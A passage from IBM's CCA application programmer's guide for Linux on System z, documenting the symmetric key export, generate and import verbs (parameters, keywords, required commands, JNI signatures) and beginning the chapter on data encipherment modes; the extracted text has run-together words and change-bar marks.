verb has a Java Native Interface (JNI) version, which is named CSNBRKAJ. See “Building Java +| applications to use with the CCAJNI” on page 16. +| The parameters for CSNBRKAJ are shown here. +196 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Restrict Key Attribute (CSNBRKA) +| +| Format +| public native void CSNBRKAJ( +| hikmNativeInteger return_code, +| hikmNativeInteger reason_code, +| hikmNativeInteger exit_data_length, +| byte[] exit_data, +| hikmNativeInteger rule_array_count, +| byte[] rule_array, +| hikmNativeInteger key_identifier_length +| byte[] key_identifier +| hikmNativeInteger key_encrypting_key_identifier_length +| byte[] key_encrypting_key_identifier +| hikmNativeInteger opt_parameter1_length +| byte[] opt_parameter1 +| hikmNativeInteger opt_parameter2_length +|| byte[] opt_parameter2); +| +| +| +Chapter5.ManagingAESandDEScryptographickeys 197 + +Symmetric Key Export (CSNDSYX) +Symmetric Key Export (CSNDSYX) +| Use this verb to transfer an application-supplied symmetric key (a DATAkey) from encryption under the +| AES or DES master key to encryption under an application-supplied RSApublic key. The +| application-supplied DATAkey must be anAES, DES or HMAC internal key token or the label of anAES +| or DES key token in theAES or DES key storage file. The Symmetric Key Import and Symmetric Key +| Import2 verbs can import the PKA-encrypted key form at the receiving node. +| Beginning with CCA4.1.0, the verb can also export an HMAC key that is contained in an internal +| variable-length symmetric key-token. The exported key is returned in an external variable-length symmetric +| key-token. +| Use the Symmetric Key Import verb to import a key exported using theAES or DES algorithm, and the +| Symmetric Key Import2 verb to import a key exported using the HMAC algorithm. +Format +CSNDSYX( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +source_key_identifier_length, +source_key_identifier, +RSA_public_key_identifier_length, +RSA_public_key_identifier, +RSA_enciphered_key_length, +RSA_enciphered_key ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +| Apointer to an integer variable containing the number of elements in the rule_array variable. This +| value must be 1, 2, or 3. +rule_array +Direction: Input Type: String +Keywords that provide control information to the verb. Each keyword is left-justified in 8-byte fields and +padded on the right with blanks.All keywords must be in contiguous storage. The rule_array keywords +are described in Table49. +Table49.KeywordsforSymmetricKeyExportcontrolinformation +Keyword Description +Algorithm(One,optional) +AES ExportanAESkey. +DES ExportaDESkey.Thisisthedefault. +|| HMAC ExportanHMACkey.ThiskeywordwasintroducedwithCCA4.1.0. +| Recoverymethod(One,required) +198 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Symmetric Key Export (CSNDSYX) +Table49.KeywordsforSymmetricKeyExportcontrolinformation (continued) +Keyword Description +PKCSOAEP SpecifiesusingthemethodfoundinRSADSIPKCS#1V2OAEP.See“PKCS#1formats”onpage +513. +PKCS-1.2 SpecifiesusingthemethodfoundinRSADSIPKCS#1blocktype02torecoverthesymmetrickey. +IntheRSAPKCS#1v2.0standard,RSAterminologydescribesthisastheRSAES-PKCS1-v1_5 +format.See“PKCS#1formats”onpage513. +|| PKOAEP2 SpecifiesthatthekeyisformattedasdefinedintheRSAPKCS#1v2.1standardforthe +| RSAES-OAEPencryptionmechanism.ValidonlywithalgorithmHMAC.Thiskeywordwasintroduced +| withCCA4.1.0.See“PKCS#1formats”onpage513. +ZERO-PAD Theclearkeyisright-justifiedinthefieldprovided,andthefieldispaddedtotheleftwithzerosupto +thesizeoftheRSAencryptionblock(whichisthemoduluslength). +| Hashmethod(whenPKOAEP2isspecified,onerequired) +|| SHA-1 SpecifiestousetheSHA-1hashmethodtocalculatetheOAEPmessagehash.Thiskeywordwas +| introducedwithCCA4.1.0. +|| SHA-256 SpecifiestousetheSHA-256hashmethodtocalculatetheOAEPmessagehash.Thiskeywordwas +| introducedwithCCA4.1.0. +|| SHA-384 SpecifiestousetheSHA-384hashmethodtocalculatetheOAEPmessagehash.Thiskeywordwas +| introducedwithCCA4.1.0. +|| SHA-512 SpecifiestousetheSHA-512hashmethodtocalculatetheOAEPmessagehash.Thiskeywordwas +| introducedwithCCA4.1.0. +source_key_identifier_length +Direction: Input Type: Integer +The length of the source_key_identifier parameter. The maximum length is 3500 bytes. +source_key_identifier +Direction: Input Type: String +| The label or internal token of a secureAES DATA, DES DATA, or HMAC key to encrypt under the +| supplied RSApublic key. The key in the key identifier must match the algorithm in the rule_array. DES +| is the default algorithm. +RSA_public_key_identifier_length +Direction: Input Type: Integer +The length of the RSA_public_key_identifier parameter. The maximum size is 3500 bytes. +RSA_public_key_identifier +Direction: Input Type: String +Apointer to a string variable containing a PKA96 RSAinternal or external key-token with the RSA +public key of the remote node that is to import the exported key. +RSA_enciphered_key_length +Direction: Input/Output Type: Integer +The length of the RSA_enciphered_key parameter. On input, this is a pointer to an integer variable +containing the number of bytes of data in the RSA_enciphered_key variable. On output, the variable is +updated with the actual length of the RSA_enciphered_key variable. The maximum length is 3500 +bytes. +RSA_enciphered_key +Direction: Output Type: String +Chapter5.ManagingAESandDEScryptographickeys 199 + +Symmetric Key Export (CSNDSYX) +This field contains the output RSA-enciphered key, protected by the public key specified in the +RSA_public_key_identifier field. +Restrictions +None +Required commands +This verb requires the following commands to be enabled in the active role based on the key-formatting +method and the algorithm: +|| +Key-formatting +|||| method Algorithm Offset Command +|||| PKOAEP2 HMAC X'00F5' SymmetricKeyExport-HMAC_PKCSOAEP +|||| PKCSOAEPor AES X'0130' Symmetric Key Export - AES_ PKCSOAEP_ PKCS-1.2 +|||| PKCS-1.2 DES X'0105' Symmetric Key Export - DES_ PKCS-1.2 +|||| ZERO-PAD AES X'0131' Symmetric Key Export - AES_ ZERO-PAD +||| DES X'023E' Symmetric Key Export - DES_ ZERO-PAD +| +Usage notes +The hardware configuration sets the limit on the modulus size of keys for key management; thus, this verb +will fail if the RSAkey modulus bit length exceeds this limit. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNDSYXJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNDSYXJ are shown here. +Format +public native void CSNDSYXJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger source_key_identifier_length, +byte[] source_key_identifier, +hikmNativeInteger RSA_public_key_token_length, +byte[] RSA_public_key_token, +hikmNativeInteger RSA_enciphered_key_length, +byte[] RSA_enciphered_key +); +Symmetric Key Import +200 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Symmetric Key Generate (CSNDSYG) +Symmetric Key Generate (CSNDSYG) +| Use the Symmetric Key Generate verb to generate anAES or DES DATAkey and return the key in two +| forms: enciphered under the master key and encrypted under an RSApublic key. +| You can import the RSApublic key encrypted form by using the Symmetric Key Import or Symmetric Key +| Import2 verbs at the receiving node. +| Also use the Symmetric Key Generate verb to generate any DES importer or exporter key-encrypting key +| encrypted under a RSApublic key according to the PKA92 formatting structure. See “PKA92 key format +| and encryption process” on page 511 for more details about PKA92 formatting. +Format +CSNDSYG( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +key_encrypting_key_identifier, +RSA_public_key_identifier_length, +RSA_public_key_identifier, +DES_enciphered_key_token_length, +DES_enciphered_key_token, +RSA_enciphered_key_length, +RSA_enciphered_key ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +| Apointer to an integer variable containing the number of elements in the rule_array variable. This +| value must be between 1 and 6. +rule_array +Direction: Input Type: String +Keywords that provide control information to the verb. The recovery method is the method to use to +recover the symmetric key. Each keyword is left-justified in an 8-byte field and padded on the right with +blanks.All keywords must be in contiguous storage. The rule_array keywords are described in +Table50. +Table50.KeywordsforSymmetricKeyGeneratecontrolinformation +Keyword Description +Algorithm(One,optional) +AES SpecifiestogenerateanAESkey. +DES SpecifiestogenerateaDESkey.Thisisthedefault. +Key-formattingmethod(Onerequired) +PKA92 Specifiesthekey-encryptingkeyistobeencryptedunderaPKA96RSApublickeyaccordingtothe +PKA92formattingstructure. +Chapter5.ManagingAESandDEScryptographickeys 201 + +Symmetric Key Generate (CSNDSYG) +Table50.KeywordsforSymmetricKeyGeneratecontrolinformation (continued) +Keyword Description +PKCSOAEP SpecifiesusingthemethodfoundinRSADSIPKCS#1V2OAEP. +PKCS-1.2 SpecifiesthemethodfoundinRSADSIPKCS#1blocktype02.IntheRSAPKCS#1v2.0standard, +RSAterminologydescribesthisastheRSAES-PKCS1-v1_5format. +ZERO-PAD Theclearkeyisright-justifiedinthefieldprovided,andthefieldispaddedtotheleftwithzerosupto +thesizeoftheRSAencryptionblock(whichisthemoduluslength). +Keylength(One,optionalusewithPKA92) +SINGLE-R Generatesakey-encryptingkeythathasequalleftandrighthalvesallowingittoperformasa +single-lengthkey.ValidonlyfortherecoverymethodofPKA92. +Keylength(One,optionalusewithPKCSOAEP,PKCS-1.2,orZERO-PAD) +SINGLE, Generatesasingle-lengthDESkey.ThisisthedefaultforDESkeys. +KEYLN8 +DOUBLE Generatesadouble-lengthDESkey.ValidonlyforDESkeys. +KEYLN16 Generatesadouble-lengthDESDATAkey.ThisisthedefaultforAESkeys. +KEYLN24 Generatesatriple-lengthDESDATAkey.ValidonlyforAESkeys +KEYLN32 Generatesa32-byteAESkey.ValidonlyforAESkeys +Enciphermentmethodforthelocalencipheredcopyofthekey(One,optionalforusewithPKCSOAEP, +PKCS-1.2,andZERO-PAD) +EX TheDESencipheredkeyisencipheredbyanEXPORTERkeythatisprovidedthroughthe +key_encrypting_key_identifierparameter. +IM TheDESencipheredkeyisencipheredbyanIMPORTERkeythatisprovidedthroughthe +key_encrypting_key_identifierparameter. +OP TheDESencipheredkeyisencipheredbythemasterkey.Thekey_encrypting_key_identifier +parameterisignored.Thisisthedefault. +| Key-wrappingmethod(One,optional) +|| USECONFG Specifiestowrapthekeyusingtheconfigurationsettingforthedefaultwrappingmethod.Thiskeyword +| isignoredforAESkeys.Thisisthedefault.ThiskeywordwasintroducedwithCCA4.1.0. +|| WRAP-ENH Specifiestowrapthekeyusingthelegacywrappingmethod.ThiskeywordisignoredforAESkeys. +| ThiskeywordwasintroducedwithCCA4.1.0. +|| WRAP-ECB Specifiestowrapthekeyusingtheenhancedwrappingmethod.ValidonlyforDESkeys.Thiskeyword +| wasintroducedwithCCA4.1.0. +| Translationcontrol(Optional)Thisisvalidonlywithkey-wrappingmethodWRAP-ENHorwithUSECONFGwhen +| thedefaultwrappingmethodisWRAP-ENH.Thisoptioncannotbeusedonakeywithacontrolvectorvaluedto +| binaryzeros. +|| ENH-ONLY Specifiestorestrictthekeyfrombeingwrappedwiththelegacywrappingmethodafterithasbeen +| wrappedwiththeenhancedwrappingmethod.Setsbit56(ENH-ONLY)ofthecontrolvectorto1.This +| keywordwasintroducedwithCCA4.1.0. +key_encrypting_key_identifier +Direction: Input/Output Type: String +The label or internal token of a key-encrypting key. If the rule_array specifies IM, this DES key must +be an IMPORTER. If the rule_array specifies EX, this DES key must be an EXPORTER. +RSA_public_key_identifier_length +Direction: Input Type: Integer +The length of the RSA_public_key_identifier parameter. If the RSA_public_key_identifier parameter is +a label, this parameter specifies the length of the label. The maximum size is 3500 bytes. +202 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Symmetric Key Generate (CSNDSYG) +RSA_public_key_identifier +Direction: Input Type: String +The token, or label, of the RSApublic key to be used for protecting the generated symmetric key. +local_enciphered_key_identifier_length +Direction: Input/Output Type: Integer +The length of the local_enciphered_key_identifier. This field is updated with the actual length of the +local_enciphered_key_identifier that is generated. The maximum length is 3500 bytes. However, this +value should be 64 as in current CCApractice a DES key-token or a key label is always a 64-byte +structure. +local_enciphered_key_identifier +Direction: Input/Output Type: String +Apointer to a string variable containing either a key name or a key token. The control vector for the +local key is taken from the identified key token. On output, the generated key is inserted into the +identified key token. +On input, you must specify a token type consistent with your choice of local-key encryption. If you +specify IM or EX, you must specify an external key-token. Otherwise, specify an internal key-token or +a null key-token. +When PKCSOAEP, PKCS-1.2, or ZERO-PAD is specified, a null key-token can be specified. In this +case, anAES DATAor DES DATAkey is returned. For an internal key (OP), a defaultAES DATAor +DATAcontrol-vector is returned in the key token. For an external key (IM or EX), the control vector is +set to null. +RSA_enciphered_key_length +Direction: Input/Output Type: Integer +The length of the RSA_enciphered_key parameter. This verb updates this with the actual length of the +RSA_enciphered_key it generates. The maximum size is 3500 bytes. +RSA_enciphered_key +Direction: Input/Output Type: String +Apointer to a string variable containing the generated RSA-enciphered key returned by the verb. If +you specify PKCSOAEP, PKCS-1.2, or ZERO-PAD, on input specify a null key token. If you specify +PKA92 on input specify an internal (operational) CCADES key-token. +Restrictions +None +Required commands +This verb requires the following commands to be enabled in the active role based on the key-formatting +method and the algorithm: +|| +Key-formatting +|||| method Algorithm Offset Command +|||| PKCSOAEPor AES X'012C' Symmetric Key Generate - AES_ PKCSOAEP_ +|||| PKCS-1.2 DES PKCS-1.2 +|| X'023F' Symmetric Key Generate - DES_ PKCS-1.2 +|||| ZERO-PAD AES X'012D' Symmetric Key Generate - AES_ ZERO-PAD +||| DES X'023C' ZERO-PAD Symmetric Key Generate +|||| PKA92 DES X'010D' SymmetricKeyGenerate-DES_PKA92 +| +Chapter5.ManagingAESandDEScryptographickeys 203 + +Symmetric Key Generate (CSNDSYG) +| The use of the WRAP-ECB or WRAP-ENH key-wrapping method keywords requires the Symmetric Key +| Generate -Allow wrapping override keywords command (offset X'013E') to be enabled. +Usage notes +The hardware configuration sets the limit on the modulus size of keys for key management; thus, this verb +will fail if the RSAkey modulus bit length exceeds this limit. +Specification of PKA92 with an input NOCV key-encrypting key token is not supported. +Use the PKA92 key-formatting method to generate a key-encrypting key. The verb enciphers one key copy +using the key encipherment technique employed in the IBM Transaction Security System (TSS) 4753, +4755, andAS/400® cryptographic product PKA92 implementations (see “PKA92 key format and encryption +process” on page 511). The control vector for the RSA-enciphered copy of the key is taken from an +internal (operational) DES key token that must be present on input in the RSA_enciphered_key variable. +Only key-encrypting keys that conform to the rules for an OPEX case under the Key Generate verb are +permitted. The control vector for the local key is taken from a DES key token that must be present on +input in the DES_enciphered_key_token variable. The control vector for one key copy must be from the +EXPORTER class while the control vector for the other key copy must be from the IMPORTER class. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNDSYGJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNDSYGJ are shown here. +Format +public native void CSNDSYGJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] key_encrypting_key_identifier, +hikmNativeInteger RSA_public_key_identifier_length, +byte[] RSA_public_key_identifier, +hikmNativeInteger local_enciphered_key_identifier_length, +byte[] local_enciphered_key_identifier, +hikmNativeInteger RSA_enciphered_key_token_length, +byte[] RSA_enciphered_key_token +); +204 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Symmetric Key Import (CSNDSYI) +Symmetric Key Import (CSNDSYI) +| Use the Symmetric Key Import verb to import a symmetricAES DATAor DES DATAkey enciphered under +| an RSApublic key. The verb returns the key in operational form, enciphered under the master key. +This verb also supports import of a PKA92-formatted DES key-encrypting key under a PKA96 RSApublic +key. +Format +CSNDSYI( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +RSA_enciphered_key_length, +RSA_enciphered_key, +RSA_private_key_identifier_length, +RSA_private_key_identifier, +target_key_identifier_length, +target_key_identifier ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +| Apointer to an integer variable containing the number of elements in the rule_array variable. This +| value must be 1, 2, 3, or 4. +rule_array +Direction: Input Type: String +The keyword that provides control information to the verb. The recovery method is the method to use +to recover the symmetric key. The keyword is left-justified in an 8-byte field and padded on the right +with blanks. The rule_array keywords are described in Table51. +Table51.KeywordsforSymmetricKeyImportcontrolinformation +Keyword Description +Algorithm(One,optional) +AES ExportanAESkey. +DES ExportaDESkey.Thisisthedefault. +Recoverymethod(Onerequired) +PKA92 Specifiesthekey-encryptingkeyisencryptedunderaPKA96RSApublickeyaccording +tothePKA92formattingstructure. +PKCSOAEP SpecifiesusingthemethodfoundinRSADSIPKCS#1V2OAEP. +PKCS-1.2 SpecifiesthemethodfoundinRSADSIPKCS#1blocktype02.IntheRSAPKCS#1 +v2.0standard,RSAterminologydescribesthisastheRSAES-PKCS1-v1_5format. +ZERO-PAD Theclearkeyisright-justifiedinthefieldprovided,andthefieldispaddedtotheleftwith +zerosuptothesizeoftheRSAencryptionblock(whichisthemoduluslength). +Chapter5.ManagingAESandDEScryptographickeys 205 + +Symmetric Key Import (CSNDSYI) +Table51.KeywordsforSymmetricKeyImportcontrolinformation (continued) +Keyword Description +| Key-wrappingmethod(One,optional) +|| USECONFG Specifiestowrapthekeyusingtheconfigurationsettingforthedefaultwrappingmethod. +| ThiskeywordisignoredforAESkeys.Thisisthedefault.Thiskeywordwasintroduced +| withCCA4.1.0. +|| WRAP-ENH Specifiestowrapthekeyusingthelegacywrappingmethod.Thiskeywordisignoredfor +| AESkeys.ThiskeywordwasintroducedwithCCA4.1.0. +|| WRAP-ECB Specifiestowrapthekeyusingtheenhancedwrappingmethod.ValidonlyforDESkeys. +| ThiskeywordwasintroducedwithCCA4.1.0. +| Translationcontrol(Optional)Thisisvalidonlywithkey-wrappingmethodWRAP-ENHorwithUSECONFG +| whenthedefaultwrappingmethodisWRAP-ENH.Thisoptioncannotbeusedonakeywithacontrolvector +| valuedtobinaryzeros. +|| ENH-ONLY Specifiestorestrictthekeyfrombeingwrappedwiththelegacywrappingmethodafterit +| hasbeenwrappedwiththeenhancedwrappingmethod.Setsbit56(ENH-ONLY)ofthe +| controlvectorto1.ThiskeywordwasintroducedwithCCA4.1.0. +RSA_enciphered_key_length +Direction: Input Type: Integer +The length of the RSA_enciphered_key parameter. The maximum size is 3500 bytes. +RSA_enciphered_key +Direction: Input Type: String +The key to import, protected under an RSApublic key. The encrypted key is in the low-order bits +(right-justified) of a string whose length is the minimum number of bytes that can contain the encrypted +key. This string is left-justified within the RSA_enciphered_key parameter. +RSA_private_key_identifier_length +Direction: Input Type: Integer +The length of the RSA_private_key_identifier parameter. When the RSA_private_key_identifier +parameter is a key label, this field specifies the length of the label. The maximum size is 3500 bytes. +RSA_private_key_identifier +Direction: Input Type: String +An internal RSAprivate key token or label whose corresponding public key protects the symmetric key. +target_key_identifier_length +Direction: Input/Output Type: Integer +The length of the target_key_identifier parameter. This field is updated with the actual length of the +target_key_identifier that is generated. The maximum length is 3500 bytes. +target_key_identifier +Direction: Input/Output Type: String +This field contains the internal token of the imported symmetric key. +Except for PKA92 processing, this verb produces a DATAkey token with a key of the same length as +that contained in the imported token. +Restrictions +None. +206 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Symmetric Key Import (CSNDSYI) +Required commands +This verb requires the following commands to be enabled in the active role based on the key-formatting +method and the algorithm: +|| +Key-formatting +|||| method Algorithm Offset Command +|||| PKA92andDATA, DES X'0235' SymmetricKeyImport-DES_PKA92KEK +| MAC,MACVER, +| KEYGENKY, +| EXPORTER,or +| OKEYXLATkey +|||| PKCSOAEPor AES X'012E' Symmetric Key Import - AES_ PKCSOAEP_ PKCS-1.2 +|||| PKCS-1.2 DES X'0106' Symmetric Key Import - DES_ PKCS-1.2 +|||| WRAP-ECBor DES X'0144' SymmetricKeyImport-Allowwrappingoverridekeywords +| WRAP-ENHused, +| anddefault +| key-wrappingmethod +| settingdoesnot +| matchkeyword +|||| ZERO-PAD AES X'012F' Symmetric Key Import - AES_ ZERO-PAD +||| DES X'023D' Symmetric Key Import - DES_ ZERO-PAD +| +Usage notes +The hardware configuration sets the limit on the modulus size of keys for key management; thus, this verb +will fail if the RSAkey modulus bit length exceeds this limit. +Specification of PKA92 with an input NOCV key-encrypting key token is not supported. +During initialization of a CEX3C, an Environment Identifier (EID) of zero will be set in the coprocessor. This +will be interpreted by the Symmetric Key Import verb to mean that environment identification checking is to +be bypassed. Thus it is possible on a Linux on IBM System z system for a key-encrypting key +RSA-enciphered at a node (EID) to be imported at the same node. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNDSYIJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNDSYIJ are shown here. +Format +public native void CSNDSYIJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger RSA_enciphered_key_length, +byte[] RSA_enciphered_key, +hikmNativeInteger RSA_private_key_identifier_length, +byte[] RSA_private_key_identifier, +hikmNativeInteger target_key_identifier_length, +byte[] target_key_identifier +); +Chapter5.ManagingAESandDEScryptographickeys 207 + +Symmetric Key Import2 (CSNDSYI2) +Symmetric Key Import2 (CSNDSYI2) +| +| Use the Symmetric Key Import2 verb to import an HMAC key that has been previously formatted and +| enciphered under an RSApublic key by the Symmetric Key Export (CSNDSYX) verb. The formatted and +| RSA-enciphered key is contained in an external variable-length symmetric key token. It is deciphered +| using the associated RSAprivate-key. The recovered HMAC key is reenciphered under theAES +| master-key. The re-enciphered key is then returned in an internal variable-length symmetric key-token. The +| key algorithm for this verb is HMAC. +Format +| +|| +CSNDSYI2( +| return_code, +| reason_code, +| exit_data_length, +| exit_data, +| rule_array_count, +| rule_array, +| RSA_enciphered_key_length, +| RSA_enciphered_key, +| RSA_private_key_identifier_length, +| RSA_private_key_identifier, +| key_name_length, +| key_name, +| target_key_identifier_length, +| target_key_identifier ) +| +Parameters +| +| For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +| “Parameters common to all verbs” on page 14. +| rule_array_count +|| Direction: Input Type: Integer +| The number of keywords you supplied in the rule_array parameter. This value must be 2. +| rule_array +|| Direction: Input Type: String +| The keywords that provide control information to the verb. The following table provides a list. The +| recovery method is the method to use to recover the symmetric key. The keywords must be 8 bytes of +| contiguous storage with the keyword left-justified in its 8-byte location and padded on the right with +| blanks. The rule_array keywords are described in Table52. +|| Table52.KeywordsforSymmetricKeyImport2controlinformation +|| Keyword Description +| Algorithm(One,required) +|| HMAC ThekeybeingimportedisanHMACkey.OnlythePKOAEP2recoverymethodissupported. +| Recoverymethod(One,required) +|| PKOAEP2 SpecifiestoformatthekeyaccordingtothemethodfoundinRSADSIPKCS#1v2.1RSAES-OAEP +| documentation. +| +| RSA_enciphered_key_length +|| Direction: Input Type: Integer +| The length of the RSA_enciphered_key parameter. The maximum size is 512 bytes. +208 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Symmetric Key Import2 (CSNDSYI2) +| RSA_enciphered_key +|| Direction: Input Type: String +| The key to import, protected under an RSApublic key. The encrypted key is in the low-order bits +| (right-justified) of a string whose length is the minimum number of bytes that can contain the encrypted +| key. This string is left-justified within the RSA_enciphered_key parameter. +| RSA_private_key_identifier_length +|| Direction: Input Type: Integer +| The length of the RSA_private_key_identifier parameter. When the RSA_private_key_identifier +| parameter is a key label, this field specifies the length of the label. The maximum size is 3500 bytes. +| RSA_private_key_identifier +|| Direction: Input Type: String +| An internal RSAprivate key token or the 64-byte label whose corresponding public key protects the +| symmetric key. +| key_name_length +|| Direction: Input Type: Integer +| The length of the key_name parameter for target_key_identifier. Valid values are 0 and 64. +| key_name +|| Direction: Input Type: String +| A64-byte key store label to be stored in the associated data structure of target_key_identifier. +| target_key_identifier_length +|| Direction: Input/Output Type: Integer +| On input, the byte length of the buffer for the target_key_identifier parameter. The buffer must be large +| enough to receive the target key token. The maximum value is 725 bytes. +| On output, the parameter will hold the actual length of the target key token. +| target_key_identifier +|| Direction: Output Type: String +| This parameter contains the internal token of the imported symmetric key. +Restrictions +| +| This verb was introduced with CCA4.1.0. +Required commands +| +| This verb requires the Symmetric Key Import2 - HMAC_PKCSOAEP command (offset X'00F4') to be +| enabled in the active role. +Usage notes +| +| This is the message layout used to encode the key material exported with the PKOAEP2 formatting +| method. +|| Table53.PKCS#1OAEPencodedmessagelayout(PKOAEP2) +||| Field Size Value +||| Hashfield 32Bytes SHA-256hashofassociateddatasectionin +| thesourcekeyidentifier +Chapter5.ManagingAESandDEScryptographickeys 209 + +Symmetric Key Import2 (CSNDSYI2) +| Table53.PKCS#1OAEPencodedmessagelayout(PKOAEP2) (continued) +||| Field Size Value +||| KeyBitLength 2Bytes variable +||| KeyMaterial Bytelengthofthekeymaterial(roundedupto variable +| thenearestbyte) +| +| Hash field +| The associated data for the HMAC variable length token is hashed using SHA-256. +| Key Bit Length +| A2 Byte key bit length field. +| Key Material +| The key material is padded to the nearest byte with '0' bits. +| The hardware configuration sets the limit on the modulus size of keys for key management; thus, this verb +| will fail if the RSAkey modulus bit length exceeds this limit. +| Specification of PKA92 with an input NOCV key-encrypting key token is not supported. +| During initialization of a CEX3C, an Environment Identifier (EID) of zero will be set in the coprocessor. This +| will be interpreted by the Symmetric Key Import2 verb to mean that environment identification checking is +| to be bypassed. Thus it is possible on a Linux on IBM System z system for a key-encrypting key +| RSA-enciphered at a node (EID) to be imported at the same node. +JNI version +| +| This verb has a Java Native Interface (JNI) version, which is named CSNDSYI2J. See “Building Java +| applications to use with the CCAJNI” on page 16. +| The parameters for CSNDSYI2J are shown here. +| +| Format +| public native void CSNDSYI2J( +| hikmNativeInteger return_code, +| hikmNativeInteger reason_code, +| hikmNativeInteger exit_data_length, +| byte[] exit_data, +| hikmNativeInteger rule_array_count, +| byte[] rule_array, +| hikmNativeInteger RSA_enciphered_key_length, +| byte[] RSA_enciphered_key, +| hikmNativeInteger RSA_private_key_identifier_length, +| byte[] RSA_private_key_identifier, +| hikmNativeInteger key_name_length, +| byte[] key_name, +| hikmNativeInteger target_key_identifier_length, +| byte[] target_key_identifier +|| ); +| +| +| +210 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Chapter 6. Protecting data +Use CCAto protect sensitive data stored on your system, sent between systems, or stored off your system +on magnetic tape. To protect data, encipher it under a key. When you want to read the data, decipher it +from ciphertext to plaintext form. +CCAprovides Encipher and Decipher verbs to perform these functions. If you use a key to encipher data, +you must use the same key to decipher the data. The Encipher and Decipher verbs use encrypted keys as +input. You can also use clear keys, indirectly, by first using the Clear Key Import verb and then using the +Encipher and Decipher verbs. +This chapter describes the following verbs used for protecting data using DES orAES: +v “Decipher (CSNBDEC)” on page 213 +v “Encipher (CSNBENC)” on page 217 +v “SymmetricAlgorithm Decipher (CSNBSAD)” on page 221 +v “SymmetricAlgorithm Encipher (CSNBSAE)” on page 226 +Modes of operation +| +| To encipher or decipher DES data or keys, CCAuses the U.S. National Institute of Standards and +| Technology (NIST) Data Encryption Standard (DES) algorithm, with single-length, double-length, or +| triple-length keys. +| To encipher or decipherAES data or keys, CCAuses the U.S. National Institute of Standards and +| Technology (NIST)Advanced Encryption Standard (AES) algorithm, with 16-byte, 24-byte or 32-byte keys. +| The Encipher and Decipher verbs operate in DES CBC (Cipher Block Chaining) mode. +Cipher Block Chaining (CBC) mode +| +| The CBC mode uses an initial chaining vector (ICV) in its processing. The CBC mode processes blocks of +| data only in exact multiples of the blocksize. The ICV is exclusive ORed with the first block of plaintext +| prior to the encryption step. The block of ciphertext just produced is exclusive-ORed with the next block of +| plaintext, and so on. You must use the same ICV to decipher the data. This disguises any pattern that may +| exist in the plaintext. CBC mode is the default for encrypting and decrypting data using the Encipher and +| Decipher verbs. “Ciphering methods” on page 494 describes the cipher processing rules in detail. +Electronic Code Book (ECB) mode +| +| In ECB mode, each block of plaintext is separately enciphered and each block of the ciphertext is +| separately deciphered. In other words, the encipherment or decipherment of a block is totally independent +| of other blocks. +Processing rules +| +| “Ciphering methods” on page 494 describes the cipher processing rules in detail. +| CCAhandles chaining for each block of data, from the first block until the last complete block of data in +| each Encipher or SymmetricAlgorithm Encipher call. There are different types of processing rules you can +| choose for block chaining: +| ANSI X9.23 +| Data is not necessarily in exact multiples of the block size. This processing rule pads the plaintext so +| the ciphertext produced is in exact multiples of the block size. +©CopyrightIBMCorp.2007,2011 211 + +| Cipher block chaining (CBC) +| Data must be an exact multiple of the block size, and output will have the same length. +| Cryptographic Unit Support Program (CUSP) +| CBC mode (cipher block chaining) that is compatible with IBM’s CUSP and PCF products. The data +| need not be in exact multiples of the block size. The ciphertext is the same length as the plaintext. +| Electronic Code Book (ECB) +| The data length must be a multiple of the block size. See “Electronic Code Book (ECB) mode” on page +| 211. +| Information Protection System (IPS) +| CBC mode that is compatible with IBM’s IPS product. The data need not be in exact multiples of the +| block size. The ciphertext is the same length as the plaintext. +| PKCS-PAD +| The data is padded on the right with between one and 16 bytes of pad characters, making ciphertext a +| multiple of the block size. +| The resulting chaining value (except for ECB mode), after an Encipher or SymmetricAlgorithm Encipher +| call, is known as an output chaining vector (OCV). When there are multiple cipher requests, the application +| can pass the OCV from the previous Encipher or SymmetricAlgorithm Encipher call, as the input chaining +| vector (ICV) in the next Encipher or SymmetricAlgorithm Encipher call. This produces chaining between +| successive calls, which is known as record chaining. CCAprovides the ICV selection keyword CONTINUE +| in the rule_array parameter used to select record chaining with the CBC processing rule. +Triple-DES encryption +| +| Triple-DES encryption uses a triple-length DATAkey comprised of three 8-byte DES keys to encipher eight +| bytes of data using the following method: +| v Encipher the data using the first key +| v Decipher the result using the second key +| v Encipher the second result using 